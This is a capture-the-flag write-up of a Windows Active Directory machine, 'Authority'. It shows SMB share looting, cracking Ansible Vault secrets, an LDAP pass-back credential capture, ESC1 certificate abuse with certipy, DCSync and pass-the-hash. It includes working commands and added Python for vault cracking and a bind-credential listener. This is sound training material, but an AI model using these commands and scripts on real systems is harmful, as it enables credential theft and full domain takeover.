Authority
(Medium, Windows)

OVERVIEW

We are given an IP address, so let's scan it with Nmap.
ENUMERATION

We got a lot of open ports. Let's check them, and don't forget to add the domain name (authority.htb) to your /etc/hosts file.
Port 80 is an IIS web server with no hidden directories worth noting, so let's check the SMB ports for guest (null) login.

Yes, guest login works and we can list the SMB shares, so let's pull the whole Development share down to our machine with smbclient for proper offline enumeration:
smbclient //authority.htb/Development -U guest%'' -c "prompt OFF;recurse ON;mget *"
Now that we have all the files, let's go through them.

The share contains an Ansible directory with four subdirectories, so Ansible is what we have to work on first; the names of those four subdirectories also hint at which services are running on this machine. After going through each directory and its files, I found some useful things:
# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT
ca_common_name: authority.htb
# ansible.cfg and ansible_inventory
remote_user = svc_pwm
ansible_user: administrator
ansible_password: Welcome1
# tomcat-users.xml.j2
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
None of these credentials worked anywhere directly, but they point strongly at PWM (the playbooks configure it), and we also got Tomcat admin credentials, which means there must be another web service besides the IIS server on port 80. Looking at my Nmap scan again, I saw this:

Navigating to port 8443 over HTTPS, I saw this:

Here it is: the PWM configuration login. We need its password to change the configuration, so I went through the PWM directory inside the Ansible directory, and in PWM/defaults/main.yml I found Ansible Vault encrypted values. After reassembling the wrapped lines, I got this:
#PWM ADMIN LOGIN
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
#PWM ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
#LDAP ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
Then I remembered that John the Ripper ships a helper, ansible2john, that turns these vault blobs into a crackable hash; cracking it gives us the vault password needed to decrypt them to plaintext.
EXPLOITATION
I saved each blob into a separate text file, giving three files, and then for each one:
ansible2john ansible_hash_file_name > new_file_name
john --wordlist=rockyou.txt new_file_name
After a while john returns the vault password needed to decrypt the vault blobs above, and the same password works for all three.
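Why an offline crack works at all: a vault 1.1 envelope is hex over a salt, an HMAC-SHA256 tag and the AES-CTR ciphertext, and both the AES key and the HMAC key are derived from the password with PBKDF2-HMAC-SHA256 (10000 rounds). A candidate password can therefore be checked by recomputing the HMAC over the ciphertext, with no decryption needed, which is exactly what john's ansible format does. The Python below is an added example (not from this post and not john's code): it parses the PWM ADMIN LOGIN blob shown above, tests it against a small constructed candidate list (which, as the post says, does not contain the vault password), and builds a constructed envelope with a known password to show a positive match. make_envelope() skips the AES step, so its output is only useful for this check, never for ansible-vault decrypt.

```python
import hashlib
import hmac
import os
from binascii import hexlify, unhexlify

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
PBKDF2_ROUNDS = 10000  # fixed by the vault 1.1 format

# The "PWM ADMIN LOGIN" envelope exactly as it appears in the playbook above.
PAGE_VAULT = """$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438"""


def parse_vault(text):
    """Split a vault 1.1 envelope into (salt, hmac_tag, ciphertext) as raw bytes.

    The body is hex of "salt_hex\\nhmac_hex\\nciphertext_hex"; ansible2john
    extracts the same three fields.
    """
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if not lines[0].startswith("$ANSIBLE_VAULT;1.1;"):
        raise ValueError("not an Ansible Vault 1.1 envelope")
    salt_hex, tag_hex, ct_hex = unhexlify("".join(lines[1:])).split(b"\n", 2)
    return unhexlify(salt_hex), unhexlify(tag_hex), unhexlify(ct_hex)


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 -> 80 bytes: AES key (32) | HMAC key (32) | CTR IV (16)."""
    km = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS, dklen=80)
    return km[:32], km[32:64], km[64:80]


def check_password(password, salt, tag, ciphertext):
    """True if HMAC-SHA256(key2, ciphertext) matches the stored tag."""
    _, key2, _ = derive_keys(password, salt)
    return hmac.compare_digest(hmac.new(key2, ciphertext, hashlib.sha256).digest(), tag)


def crack(vault_text, candidates):
    """Return the first candidate whose HMAC verifies, else None (what john does)."""
    salt, tag, ciphertext = parse_vault(vault_text)
    for pw in candidates:
        if check_password(pw, salt, tag, ciphertext):
            return pw
    return None


def make_envelope(password, ciphertext):
    """Constructed test vector: an envelope whose HMAC layer is valid for `password`.

    `ciphertext` is used as-is (no AES-CTR here), so ansible-vault cannot decrypt
    the result, but it is enough to exercise the cracking check above.
    """
    salt = os.urandom(32)
    _, key2, _ = derive_keys(password, salt)
    tag_hex = hmac.new(key2, ciphertext, hashlib.sha256).hexdigest().encode()
    body = hexlify(b"\n".join([hexlify(salt), tag_hex, hexlify(ciphertext)])).decode()
    return VAULT_HEADER + "\n" + "\n".join(body[i:i + 80] for i in range(0, len(body), 80))


if __name__ == "__main__":
    wordlist = ["password", "Welcome1", "SuP3rS3creT", "T0mc@tAdm1n"]  # constructed, not rockyou
    print("page vault:", crack(PAGE_VAULT, wordlist))
    demo = make_envelope("correct horse", b"\x00" * 16)
    print("constructed vault:", crack(demo, wordlist + ["correct horse"]))
```

The 10000 PBKDF2 rounds are why john needs "some time" even on rockyou: each guess costs a full key derivation, and the only shortcut is a better wordlist.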

Now save this password in a file named pwd.txt and use the ansible-vault tool; it ships with ansible-core, which you can install with pip3 if you don't have it:
pip3 install ansible-core --break-system-packages
Now go to the directory with the original vault blobs (not the ansible2john output files) and run:
ansible-vault decrypt -v your-ansible-file --vault-password-file=pwd.txt

ansible-vault decrypt rewrites the file in place, so after decryption the PWM admin password sits in the same file that held the blob.
Now log in to the PWM Configuration Editor on the website and use its search bar to find the LDAP Profile (Enabled) option.

There is a well-known trick called an LDAP pass-back attack: when PWM tests an LDAP profile it binds to whatever LDAP URL is configured, using the credentials of the LDAP Proxy User shown above (svc_ldap in this case). If we point that URL at our own machine and listen on the port, PWM hands us the proxy user's password, because a simple bind sends it in cleartext.
To know more about this attack, read this ….
So let's change the LDAP URL from its default to the following (keep the ldap:// scheme rather than ldaps://, otherwise PWM starts a TLS handshake and the listener only sees a ClientHello):
#on website
ldap://YOUR-MACHINE-IP:636
#on your machine
nc -lvnp 636

Now click Test LDAP Profile, head back to your listener and wait!

You will receive the password for the svc_ldap user. Now let's check whether it is valid for a shell.
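What the listener actually receives is an LDAP simple BindRequest: a BER-encoded message carrying the proxy user's DN and its password in cleartext, which is why plain nc is enough to read it off the wire. The script below is an added example (not from the original post): it builds such a request from constructed values and decodes it again, and its serve_once() can stand in for nc on port 636 and print the bind credentials instead of raw bytes. The DN and password are made up, since the real ones are not shown on this page.

```python
import socket

# Constructed sample values; the page's real DN and password are not shown.
SAMPLE_DN = "CN=svc_ldap,CN=Users,DC=authority,DC=htb"
SAMPLE_PASSWORD = "pr0xy-us3r-s3cr3t"


def _tlv(tag, body):
    """BER-encode one tag/length/value triple (definite-length form)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    nb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(nb)]) + nb + body


def _ber_int(value):
    return _tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big"))


def build_bind_request(message_id, dn, password):
    """What an LDAP client sends for a simple bind: version 3, DN, password in the clear."""
    op = _ber_int(3) + _tlv(0x04, dn.encode()) + _tlv(0x80, password.encode())
    # 0x60 = [APPLICATION 0] BindRequest, 0x80 = [0] simple authentication
    return _tlv(0x30, _ber_int(message_id) + _tlv(0x60, op))


def _read_tlv(buf, pos):
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(data):
    """Pull message_id, version, DN and password out of a raw simple BindRequest."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = _read_tlv(msg, 0)
    tag, op, _ = _read_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError("protocolOp is not a BindRequest")
    _, ver, pos = _read_tlv(op, 0)
    _, dn, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    if auth_tag != 0x80:
        raise ValueError("not a simple bind (SASL); no cleartext password here")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "dn": dn.decode(errors="replace"),
        "password": auth.decode(errors="replace"),
    }


def serve_once(host="0.0.0.0", port=636):
    """Listen like `nc -lvnp 636`, but decode the bind instead of dumping raw bytes."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    creds = parse_bind_request(data)
    print(f"[+] bind from {peer[0]}: {creds['dn']} / {creds['password']}")
    return creds


if __name__ == "__main__":
    sample = build_bind_request(1, SAMPLE_DN, SAMPLE_PASSWORD)
    print(sample.hex())
    print(parse_bind_request(sample))
```

Run it with `sudo python3 passback.py` (binding port 636 needs root) before clicking Test LDAP Profile; the ValueError on a SASL bind is deliberate, since a server that negotiates GSSAPI or NTLM never sends the password itself.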
USER FLAG

As you can see it is valid, and we have our user flag.
PRIVILEGE ESCALATION
I remembered seeing an ADCS directory inside the Ansible directory, so let's quickly check for ADCS misconfigurations with Certipy (make sure you are on the latest version):
certipy find -u svc_ldap@authority.htb -p 'REDACTED' -dc-ip 10.129.47.203 -vulnerable -stdout

And there it is: a template vulnerable to ESC1.
Understanding the vulnerability
Note the Enrollable Principals: Domain Computers. That means any domain-joined computer account can request a certificate from this template, but svc_ldap is a user account, not a computer account. If we have the right to add a computer account, we can create one and enroll as it.
So let's check in our svc_ldap shell:
([ADSI]"LDAP://DC=authority,DC=htb")."ms-DS-MachineAccountQuota"

The default ms-DS-MachineAccountQuota is 10, and since it is greater than 0, an ordinary authenticated user is allowed to join that many computer accounts to the domain. So let's use Impacket's addcomputer.py:
addcomputer.py -computer-name MEOWPC$ -computer-pass '0xme0w' authority.htb/svc_ldap:'REDACTED'

We successfully added the computer account. Now let's request a certificate as that computer while supplying the Administrator UPN in the request, which is exactly what ESC1 permits:
certipy req -u 'MEOWPC$' -p '0xme0w' -dc-ip 10.129.47.203 -target 'authority.htb' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb'
The CA name and template name come from the earlier certipy find output.
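To make the reasoning behind the last few steps concrete, here is an added example (not from the original post, and not certipy's own code) that reimplements the conditions certipy checks for ESC1 over a constructed template record, then decides whether to enroll directly as the user or, as on this box, through a freshly added computer account gated by ms-DS-MachineAccountQuota. The template values, including the extra Server Authentication EKU and the Domain Admins enroll entry, are assumed for illustration and were not read from the real CorpVPN object; the flag values and OIDs are the standard ADCS ones.

```python
# Bit flags and OIDs from the ADCS template attributes; the checks mirror the
# conditions certipy reports as ESC1.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag (manager approval)

OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT_AUTH, OID_ANY_PURPOSE}

# Principals a low-privileged account either is, or can become by creating an object.
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def allows_client_auth(ekus):
    """Empty EKU list means any purpose; otherwise an authentication EKU must be present."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_findings(template):
    """Return the reasons the template is NOT ESC1; an empty list means vulnerable."""
    reasons = []
    if not template["enabled"]:
        reasons.append("template not published on any CA")
    if not template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee cannot supply the subject (no arbitrary UPN/SAN)")
    if template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("manager approval required")
    if template["ra_signatures"] > 0:
        reasons.append("authorized signatures required")
    if not allows_client_auth(template["ekus"]):
        reasons.append("no client-authentication EKU")
    if not (LOW_PRIV_GROUPS & set(template["enroll_principals"])):
        reasons.append("no low-privileged principal has Enroll rights")
    return reasons


def enrollment_path(template, machine_account_quota):
    """Which identity to request with: 'user', 'new-computer', or None if no path."""
    if esc1_findings(template):
        return None
    principals = set(template["enroll_principals"])
    if principals & {"Domain Users", "Authenticated Users", "Everyone"}:
        return "user"
    if "Domain Computers" in principals and machine_account_quota > 0:
        return "new-computer"   # addcomputer.py, then certipy req as that account
    return None


# Constructed template record shaped like certipy find output (assumed values).
CORPVPN_LIKE = {
    "name": "CorpVPN",
    "enabled": True,
    "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ra_signatures": 0,
    "ekus": [OID_CLIENT_AUTH, "1.3.6.1.5.5.7.3.1"],   # Client Auth + Server Auth
    "enroll_principals": ["Domain Computers", "Domain Admins"],
}

# The same template with the two settings that close ESC1: the CA picks the subject
# from AD, and every request waits for a manager.
HARDENED = dict(CORPVPN_LIKE, name="CorpVPN-Fixed", name_flag=0,
                enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS)

if __name__ == "__main__":
    for tpl in (CORPVPN_LIKE, HARDENED):
        print(tpl["name"], esc1_findings(tpl) or "ESC1", enrollment_path(tpl, 10))
```

Defensively, setting ms-DS-MachineAccountQuota to 0 alone does not fix the template (the HARDENED record shows the settings that do), but it does remove the path used here for any template whose only low-privileged enroller is Domain Computers.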

We got administrator.pfx. Now let's try authenticating with the certificate.
If you get a clock skew error, sync your clock with the DC first: sudo ntpdate IP
NOTE: Due to some issues I had to reset my machine so don’t worry on seeing New IP in images below
certipy auth -pfx administrator.pfx -dc-ip 10.129.47.203 -username administrator -domain authority.htb

We, however, get an error: KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type). Some searching points us to this blog post, which explains that this most likely means the target Domain Controller does not support PKINIT, typically because it has no certificate usable for Kerberos authentication. We can, however, use the PassTheCert tool to authenticate against LDAP with the certificate over Schannel (Secure Channel) instead.
PassTheCert needs the Administrator certificate and private key as separate PEM files.
You can extract them from the .pfx with openssl pkcs12, or directly with Certipy, which I prefer:
certipy cert -pfx administrator.pfx -nocert -out administrator.key
certipy cert -pfx administrator.pfx -nokey -out administrator.crt

Now copy administrator.crt and administrator.key to the PassTheCert/Python directory (the .pfx itself is not needed there).
There are many ways to get SYSTEM access from here; we will cover the fastest one and leave the rest for you to figure out :)
Enter the LDAP shell:
python3 passthecert.py -action ldap-shell -crt administrator.crt -key administrator.key -domain authority.htb -dc-ip 10.129.47.203

As you can see we are in an LDAP shell as Administrator; from there I added svc_ldap to the Domain Admins group (the shell's add_user_to_group command).
Now that svc_ldap is a Domain Admin, we can dump the Administrator hash with Impacket's secretsdump.py (DCSync):
secretsdump.py authority.htb/svc_ldap:'REDACTED'@10.129.47.203

Grab the Administrator NT hash and pass it to evil-winrm to get an Administrator WinRM shell and the root flag:
ROOT FLAG
evil-winrm -i 10.129.47.203 -u Administrator -H HASH

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!




